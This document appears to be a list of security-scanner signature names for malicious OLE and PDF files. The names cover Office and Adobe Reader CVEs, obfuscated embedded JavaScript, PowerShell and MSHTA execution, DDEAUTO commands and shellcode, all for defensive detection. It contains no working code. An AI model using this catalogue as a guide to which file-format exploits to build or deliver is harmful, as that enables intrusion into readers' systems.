File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-MulRk-Record-Parsing-Heap-Buffer-Overflow
File-OLE_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-OLE_EICAR-AntiVirus-Test
File-OLE_Embedded-Executable-File
File-OLE_Embedded-JavaScript-In-OLE
File-OLE_Embedded-JavaScript-Obfuscated-Eval-Function
File-OLE_Embedded-JavaScript-Obfuscated-Unescape-Function
File-OLE_Embedded-TIFF-File
File-OLE_Embedded-Zip-Archive
File-OLE_Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272
File-OLE_Excel-Memory-Corruption-CVE-2010-0823
File-OLE_Generic-OLE-Package
File-OLE_HTTP-Suspicious-Embedded-Zip-In-Excel
File-OLE_HTTP-Transfer-Over-Nonstandard-Port
File-OLE_Kingsoft-Writer-Font-Names-Buffer-Overflow
File-OLE_Malicious-Looking-Document
File-OLE_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
File-OLE_Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
File-OLE_Microsoft-ActiveX-Code-Execution-CVE-2012-0158
File-OLE_Microsoft-DirectPlay-Heap-Overflow-Vulnerability
File-OLE_Microsoft-Equation-2.0-Document
File-OLE_Microsoft-Equation-3.0-Document
File-OLE_Microsoft-Excel-95-Workbook
File-OLE_Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978
File-OLE_Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990
File-OLE_Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution
File-OLE_Microsoft-Excel-Colinfo-Record-Buffer-Overflow
File-OLE_Microsoft-Excel-Column-Record-Handling-Memory-Corruption
File-OLE_Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability
File-OLE_Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution
File-OLE_Microsoft-Excel-Continuefrt12-Record-Parsing-Heap-Buffer-Overflow
File-OLE_Microsoft-Excel-Crafted-Picture-Record-Code-Execution
File-OLE_Microsoft-Excel-Crafted-Url-Buffer-Overflow
File-OLE_Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980
File-OLE_Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105
File-OLE_Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution
File-OLE_Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264
File-OLE_Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution
File-OLE_Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
File-OLE_Microsoft-Excel-File-Handling-Code-Execution-Vulnerability
File-OLE_Microsoft-Excel-File-Parsing-Memory-Corruption
File-OLE_Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262
File-OLE_Microsoft-Excel-For-Asian-Languages-Style-Handling-Buffer-Overflow
File-OLE_Microsoft-Excel-Format-Record-Array-Index-Memory-Corruption
File-OLE_Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow
File-OLE_Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977
File-OLE_Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098
File-OLE_Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273
File-OLE_Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097
File-OLE_Microsoft-Excel-Malformed-Filter-Records-Handling-Code-Execution
File-OLE_Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution
File-OLE_Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution
File-OLE_Microsoft-Excel-Malformed-Imdata-Record
File-OLE_Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption
File-OLE_Microsoft-Excel-Malformed-Record-Memory-Corruption
File-OLE_Microsoft-Excel-Malformed-Selection-Record-Code-Execution
File-OLE_Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261
File-OLE_Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260
File-OLE_Microsoft-Excel-Memory-Corruption-CVE-2012-1886
File-OLE_Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275
File-OLE_Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237
File-OLE_Microsoft-Excel-MergeCells-Record-Heap-Overflow-Vulnerability
File-OLE_Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption
File-OLE_Microsoft-Excel-Named-Graph-Record-Parsing-Stack-Overflow
File-OLE_Microsoft-Excel-Note-Record-Information-Disclosure-CVE-2018-8382
File-OLE_Microsoft-Excel-OBJECTLINK-Memory-Corruption-Vulnerability
File-OLE_Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274
File-OLE_Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability
File-OLE_Microsoft-Excel-Parsed-Expression-Information-Disclosure-CVE-2018-8246
File-OLE_Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption
File-OLE_Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240
File-OLE_Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257
File-OLE_Microsoft-Excel-Record-Memory-Corruption-CVE-2011-3403
File-OLE_Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230
File-OLE_Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101
File-OLE_Microsoft-Excel-Rept-Function-Integer-Overflow
File-OLE_Microsoft-Excel-Rich-Text-Handling-Code-Execution
File-OLE_Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution
File-OLE_Microsoft-Excel-SerAuxErrBar-Heap-Overflow
File-OLE_Microsoft-Excel-Set-Font-Handling-Code-Execution
File-OLE_Microsoft-Excel-Sst-Invalid-Length-Use-After-Free
File-OLE_Microsoft-Excel-Style-Record-Data-Handling-Code-Execution
File-OLE_Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
File-OLE_Microsoft-Excel-Txo-And-Obj-Records-Parsing-Stack-Memory-Corruption
File-OLE_Microsoft-Excel-Type-Mismatch-Series-Record-Parsing-Memory-Corruption
File-OLE_Microsoft-Excel-Version-Information-Handling-Code-Execution
File-OLE_Microsoft-Excel-Window2-Record-Use-After-Free
File-OLE_Microsoft-Excel-Workbook
File-OLE_Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution
File-OLE_Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278
File-OLE_Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow
File-OLE_Microsoft-Hyperlink-Object-Library-Information-Disclosure
File-OLE_Microsoft-Installer-Database
File-OLE_Microsoft-Installer-Patch
File-OLE_Microsoft-Installer-Transform
File-OLE_Microsoft-Jet-Database-Engine-Excel-Component-Buffer-Overflow
File-OLE_Microsoft-Jet-Database-Engine-Excel-Component-Heap-Buffer-Overflow
File-OLE_Microsoft-Jet-Database-Engine-Heap-Based-Buffer-Overflow
File-OLE_Microsoft-Office-Art-Drawing-Records-CVE-2010-3334
File-OLE_Microsoft-Office-Art-Property-Table-Memory-Corruption
File-OLE_Microsoft-Office-Bad-Index-Memory-Corruption
File-OLE_Microsoft-Office-Buffer-Overflow-CVE-2013-1331
File-OLE_Microsoft-Office-Ctasksymbol-Use-After-Free
File-OLE_Microsoft-Office-CVE-2016-7264-Out-Of-Bounds-Read
File-OLE_Microsoft-Office-CVE-2016-7289-Memory-Corruption
File-OLE_Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335
File-OLE_Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution
File-OLE_Microsoft-Office-Drawing-Shapes-Handling-Memory-Corruption
File-OLE_Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution
File-OLE_Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow
File-OLE_Microsoft-Office-Excel-CVE-2019-1110-Information-Disclosure
File-OLE_Microsoft-Office-Excel-File-Obj-Record-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Formula-Record-Code-Execution
File-OLE_Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow
File-OLE_Microsoft-Office-Excel-Malformed-LBL-Record-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution
File-OLE_Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow
File-OLE_Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
File-OLE_Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
File-OLE_Microsoft-Office-Excel-Object-Record-Corruption
File-OLE_Microsoft-Office-Excel-Ptgextraarray-Structure-Parsing-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Publisher-Record-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution
File-OLE_Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
File-OLE_Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
File-OLE_Microsoft-Office-Excel-RTD-Buffer-Overflow
File-OLE_Microsoft-Office-Excel-Sheet-Object-Type-Confusion
File-OLE_Microsoft-Office-Excel-String-Variable-Code-Execution
File-OLE_Microsoft-Office-Excel-Sxdb-Memory-Corruption
File-OLE_Microsoft-Office-Excel-SxView-Memory-Corruption
File-OLE_Microsoft-Office-Excel-SxView-SXStreamID-CVE-2010-1245
File-OLE_Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution
File-OLE_Microsoft-Office-Excel-Unexpected-Field-Value-Memory-Corruption
File-OLE_Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
File-OLE_Microsoft-Office-File-Modification-Password-Usage
File-OLE_Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951
File-OLE_Microsoft-Office-Gdiplus-EMF-File-Handling-Infinite-Loop
File-OLE_Microsoft-Office-Malformed-Routing-Slip-Code-Execution
File-OLE_Microsoft-Office-Malicious-OLE-File
File-OLE_Microsoft-Office-MSO-Buffer-Overflow
File-OLE_Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336
File-OLE_Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
File-OLE_Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
File-OLE_Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution
File-OLE_Microsoft-Office-PowerPoint-MS09-017
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
File-OLE_Microsoft-Office-Publisher-Invalid-Memory-Reference
File-OLE_Microsoft-Office-RCE-CVE-2017-0199
File-OLE_Microsoft-Office-Suspicious-Ddeauto-Command
File-OLE_Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
File-OLE_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
File-OLE_Microsoft-Office-Visio-Data-Type-Memory-Corruption
File-OLE_Microsoft-Office-Word-CVE-2014-6333-Use-After-Free
File-OLE_Microsoft-Office-Word-CVE-2019-0540-Security-Feature-Bypass
File-OLE_Microsoft-Office-Word-CVE-2019-0561-Information-Disclosure
File-OLE_Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption
File-OLE_Microsoft-Office-Word-HTML-Linked-Objects-Memory-Corruption
File-OLE_Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow
File-OLE_Microsoft-Office-Word-Sprmtdiagline80-Record-Parsing-Stack-Buffer-Overflow
File-OLE_Microsoft-Office-Word-Stsh-Record-Parsing-Memory-Corruption
File-OLE_Microsoft-OLE-Automation-Heap-Overrun
File-OLE_Microsoft-OLE-Property-Vulnerability
File-OLE_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397
File-OLE_Microsoft-Outlook-Message
File-OLE_Microsoft-Outlook-RCE-CVE-2017-0106
File-OLE_Microsoft-Outlook-SMB-Msg-Attachment
File-OLE_Microsoft-PowerPoint-2003-Heap-Overflow
File-OLE_Microsoft-PowerPoint-95-Presentation
File-OLE_Microsoft-PowerPoint-Add-In
File-OLE_Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
File-OLE_Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability
File-OLE_Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
File-OLE_Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
File-OLE_Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability
File-OLE_Microsoft-PowerPoint-OfficeArt-Shape-RCE-Vulnerability
File-OLE_Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
File-OLE_Microsoft-PowerPoint-PPT-Document-Parsing-Exploit
File-OLE_Microsoft-PowerPoint-PPT-File-Parsing-Memory-Corruption
File-OLE_Microsoft-PowerPoint-Presentation
File-OLE_Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269
File-OLE_Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269
File-OLE_Microsoft-PowerPoint-Slide
File-OLE_Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution
File-OLE_Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow
File-OLE_Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955
File-OLE_Microsoft-Publisher-Document-With-Suspicious-VBA-Script
File-OLE_Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow
File-OLE_Microsoft-Publisher-Invalid-Pointer-CVE-2011-3411
File-OLE_Microsoft-Publisher-Memory-Corruption-CVE-2011-3412
File-OLE_Microsoft-Publisher-Out-Of-Bounds-Array-Index-CVE-2011-3410
File-OLE_Microsoft-Publisher-Pubconv.dll-Function-Pointer-Overwrite
File-OLE_Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569
File-OLE_Microsoft-Structured-Storage-Excessive-SAT-Size
File-OLE_Microsoft-Structured-Storage-File
File-OLE_Microsoft-Structured-Storage-Suspicious-File
File-OLE_Microsoft-VBA6-Stack-Memory-Corruption
File-OLE_Microsoft-Visio-Drawing
File-OLE_Microsoft-Visio-Version-Number-Handling-Code-Execution
File-OLE_Microsoft-Visio-Viewer-VSD-File-Memory-Corruption
File-OLE_Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0019
File-OLE_Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0136
File-OLE_Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability
File-OLE_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
File-OLE_Microsoft-Windows-CVE-2012-0013-Insecure-ClickOnce-Application
File-OLE_Microsoft-Windows-Els.dll-Insecure-Library-Loading
File-OLE_Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability
File-OLE_Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading
File-OLE_Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow
File-OLE_Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow
File-OLE_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
File-OLE_Microsoft-Windows-MSI-File-Signature-Spoofing-Vulnerability
File-OLE_Microsoft-Windows-Object-Packager-Remote-Code-Execution
File-OLE_Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution
File-OLE_Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution
File-OLE_Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution
File-OLE_Microsoft-Windows-OLE-Packer-Remote-Code-Execution
File-OLE_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0016
File-OLE_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
File-OLE_Microsoft-Windows-Shell-MSHTA-Script-Execution
File-OLE_Microsoft-Windows-WordPad-Converter-Parsing-Memory-Corruption
File-OLE_Microsoft-Word-6-Document
File-OLE_Microsoft-Word-Crafted-Smarttag-Record-Code-Execution
File-OLE_Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption
File-OLE_Microsoft-Word-Document
File-OLE_Microsoft-Word-Fcplcffldmom-Memory-Corruption
File-OLE_Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption
File-OLE_Microsoft-Word-Global-Array-Index-Heap-Overflow
File-OLE_Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
File-OLE_Microsoft-Word-Malformed-Index-Code-Execution
File-OLE_Microsoft-Word-Mso.dll-Lscreateline-Memory-Corruption
File-OLE_Microsoft-Word-RCE-Vulnerability-CVE-2015-0097
File-OLE_Microsoft-Word-Section-Table-Array-Buffer-Overflow
File-OLE_Microsoft-Word-Sprmsdyatop-Memory-Corruption
File-OLE_Microsoft-WordPad-Text-Converter-Buffer-Overflow
File-OLE_Microsoft-WordPad-Text-Converter-CVE-2010-2563
File-OLE_Microsoft-WordPad-Word-Converter-Xst-Structure-Buffer-Overflow
File-OLE_Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow
File-OLE_Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF
File-OLE_Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt
File-OLE_Microsoft-WPS-Converter-Heap-Overflow-Vulnerability
File-OLE_Microsoft_Outlook_Use_After_Free_Vulnerability_CVE-2019-1199
File-OLE_Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2019-0885
File-OLE_Microsoft_Word_Out_Of_Bound_Write_Vulnerability_CVE-2019-1201
File-OLE_Mozilla-Installation-File-Detected
File-OLE_Null-Class-Id
File-OLE_Office-BMP-Integer-Overflow-CVE-2009-2518
File-OLE_Office-Macro-Document
File-OLE_OpenOffice-MS-Word-File-Processing-Integer-Underflow
File-OLE_OpenOffice-OLE-File-Stream-Buffer-Overflow
File-OLE_Oracle-Fusion-Middleware-Outside-In-Excel-File-Parsing-Integer-Overflow
File-OLE_Oracle-Outside-In-Excel-Gelframe-Officeartreclen-Out-Of-Bounds-Read
File-OLE_Oracle-Outside-In-Excel-Gelframe-Out-Of-Bounds-Read
File-OLE_Oracle-Outside-In-Excel-Propertysetstream-Out-Of-Bounds-Write
File-OLE_Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101
File-OLE_Php-OLE-File-Handling-Infinite-Loop
File-OLE_Poster-Software-Publish-It-Pui-File-Processing-Buffer-Overflow
File-OLE_PowerShell-In-Office-Document
File-OLE_Shared-Variables
File-OLE_Siemens-Tecnomatix-Plant-Simulation-Spp-File-Parsing-Stack-Buffer-Overflow
File-OLE_SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880
File-OLE_Softmaker-Office-Planmaker-Excel-Sst-Record-Buffer-Overflow
File-OLE_Softmaker-Office-Planmaker-Pmd-Document-0x8010-Record-Out-Of-Bounds-Write
File-OLE_Softmaker-Office-Planmaker-Pmd-Document-Records-Integer-Overflow
File-OLE_Sophos-Anti-Virus-Visio-File-Parsing-Buffer-Overflow
File-OLE_Suspicious-Author-Field-In-Microsoft-OLE-Compound-File
File-OLE_Suspicious-File
File-OLE_Unknown-Class-Id
File-OLE_Unusual-Directory-Structure
File-OLE_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
File-OLE_Windows-Shell-Graphics-Thumbnail-Image-Integer-Overflow
File-OLE_Windows-URL-Zone-Check-Bypass-CVE-2023-29324
File-OLE_Windows-URL-Zone-Check-Bypass-CVE-2023-35384
File-OLE_x86-X41nop-Shellcode
File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Addfield-Use-After-Free
File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-buttonGetIcon-Use-After-Free
File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Deleteitemat-Use-After-Free
File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Field-Format-Action-Use-After-Free
File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Heap-Buffer-Overflow
File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Information-Disclosure
File-PDF_Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
File-PDF_Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow-2
File-PDF_Adobe-Acrobat-And-Adobe-Reader-U3D-Rhadobemeta-Buffer-Overflow
File-PDF_Adobe-Acrobat-And-Reader-Acroform-Encoding-Code-Execution
File-PDF_Adobe-Acrobat-And-Reader-Acroform-Font-Encoding-Code-Execution
File-PDF_Adobe-Acrobat-And-Reader-Acroform-Use-After-Free
File-PDF_Adobe-Acrobat-And-Reader-Addannot-Use-After-Free
File-PDF_Adobe-Acrobat-And-Reader-Dc-Acroform-Buttongetcaption-Use-After-Free
File-PDF_Adobe-Acrobat-And-Reader-Docid-Stack-Buffer-Overflow
File-PDF_Adobe-Acrobat-And-Reader-Escript-Out-Of-Bounds-Read
File-PDF_Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow
File-PDF_Adobe-Acrobat-And-Reader-Form-Field-Format-Use-After-Free
File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Out-Of-Bounds-Read
File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read
File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-15953
File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4949
File-PDF_Adobe-Acrobat-And-Reader-PDF-XML-Stylesheet-Information-Disclosure
File-PDF_Adobe-Acrobat-And-Reader-Remote-Code-Execution
File-PDF_Adobe-Acrobat-And-Reader-U3D-Uninitialized-Variable
File-PDF_Adobe-Acrobat-And-Reader-Xfa-Oneofchild-Remote-Code-Execution
File-PDF_Adobe-Acrobat-Cooltype-Sing-Buffer-Overflow
File-PDF_Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
File-PDF_Adobe-Acrobat-CustomDictionaryOpen-BOF
File-PDF_Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow
File-PDF_Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow-2
File-PDF_Adobe-Acrobat-Flatedecode-Integer-Overflow
File-PDF_Adobe-Acrobat-Font-Processing-Memory-Corruption
File-PDF_Adobe-Acrobat-GetAnnots-Memory-Corruption
File-PDF_Adobe-Acrobat-Gotoe-Information-Disclosure
File-PDF_Adobe-Acrobat-JavaScript-Field-Name-Out-Of-Bounds-Read
File-PDF_Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow
File-PDF_Adobe-Acrobat-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4990
File-PDF_Adobe-Acrobat-JPXDecode-Memory-Corruption
File-PDF_Adobe-Acrobat-Media-Newplayer-Code-Execution
File-PDF_Adobe-Acrobat-Ocg-Setintent-Integer-Overflow
File-PDF_Adobe-Acrobat-PDF-Formatstring
File-PDF_Adobe-Acrobat-Pro-Dc-Acroform-setFocus-Use-After-Free
File-PDF_Adobe-Acrobat-Pro-Dc-Fdf-Object-Use-After-Free
File-PDF_Adobe-Acrobat-Pro-Dc-JavaScript-Submitform-Url-Out-Of-Bounds-Read
File-PDF_Adobe-Acrobat-Pro-Information-Disclosure-CVE-2015-3058
File-PDF_Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3053
File-PDF_Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3054
File-PDF_Adobe-Acrobat-Reader-Dc-Annots-File-Id-Out-Of-Bounds-Read
File-PDF_Adobe-Acrobat-Reader-Dc-Annots.api-Setprops-Use-After-Free
File-PDF_Adobe-Acrobat-Reader-Dc-Escript.api-Thermometer-Object-Use-After-Free
File-PDF_Adobe-Acrobat-Reader-Dc-Jpeg2000-Heap-Buffer-Overflow
File-PDF_Adobe-Acrobat-Reader-Dc-Path-Join-Out-Of-Bounds-Read
File-PDF_Adobe-Acrobat-Reader-Dc-Window-Procedure-wm_setFocus-Use-After-Free
File-PDF_Adobe-Acrobat-Reader-Esobject-Use-After-Free
File-PDF_Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2946
File-PDF_Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2949
File-PDF_Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow
File-PDF_Adobe-Acrobat-Reader-JBIG2-CVE-2013-3352
File-PDF_Adobe-Acrobat-Reader-Jpeg2000-CVE-2016-6941-Information-Disclosure
File-PDF_Adobe-Acrobat-Reader-Jpeg2000-Information-Disclosure
File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6942
File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6970
File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2941
File-PDF_Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6957
File-PDF_Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6958
File-PDF_Adobe-Acrobat-Reader-Stack-Overflow-CVE-2017-2948
File-PDF_Adobe-Acrobat-Reader-Toolbutton-Use-After-Free
File-PDF_Adobe-Acrobat-Reader-Type-Confusion-CVE-2017-2962
File-PDF_Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution
File-PDF_Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6944
File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6945
File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2955
File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2956
File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2961
File-PDF_Adobe-Acrobat-Reader-Xfa-Formcalc-Replace-Integer-Overflow
File-PDF_Adobe-authplay.dll-CVE-2010-1297-Exploit
File-PDF_Adobe-Flash-Exploit-CVE-2011-0609
File-PDF_Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware
File-PDF_Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware-2
File-PDF_Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow
File-PDF_Adobe-Reader-And-Acrobat-Rle-Encoded-BMP-File-Integer-Overflow
File-PDF_Adobe-Reader-And-Acrobat-Rma-Objects-Memory-Corruption
File-PDF_Adobe-Reader-And-Acrobat-Sandbox-Policy-Bypass
File-PDF_Adobe-Reader-BMP-Multiple-Vulnerabilities
File-PDF_Adobe-Reader-BMP-Vulnerability-2011-2438c
File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2012-2050
File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3353
File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3354
File-PDF_Adobe-Reader-Crash-CVE-2015-3056
File-PDF_Adobe-Reader-Heap-Overflow-CVE-2017-3055
File-PDF_Adobe-Reader-Heap-Overflow-Vulnerability
File-PDF_Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0604
File-PDF_Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow
File-PDF_Adobe-Reader-Information-Disclosure-CVE-2017-3031
File-PDF_Adobe-Reader-Integer-Overflow-CVE-2010-2862
File-PDF_Adobe-Reader-JavaScript-Heap-Corruption-CVE-2011-4371
File-PDF_Adobe-Reader-JavaScript-Memory-Corruption-CVE-2011-4373
File-PDF_Adobe-Reader-JavaScript-Vulnerability-2011-2442
File-PDF_Adobe-Reader-JPEG-Multiple-App0-Markers
File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3019
File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3025
File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3030
File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3056
File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4147
File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4148
File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4150
File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4151
File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4152
File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4153
File-PDF_Adobe-Reader-OpenTextFile-Buffer-Overflow
File-PDF_Adobe-Reader-Pcx-Height-Integer-Overflow
File-PDF_Adobe-Reader-Pict-Header-Packet-Overflow
File-PDF_Adobe-Reader-Printseps-Memory-Corruption
File-PDF_Adobe-Reader-Security-Bypass-Vulnerability-CVE-2013-0622
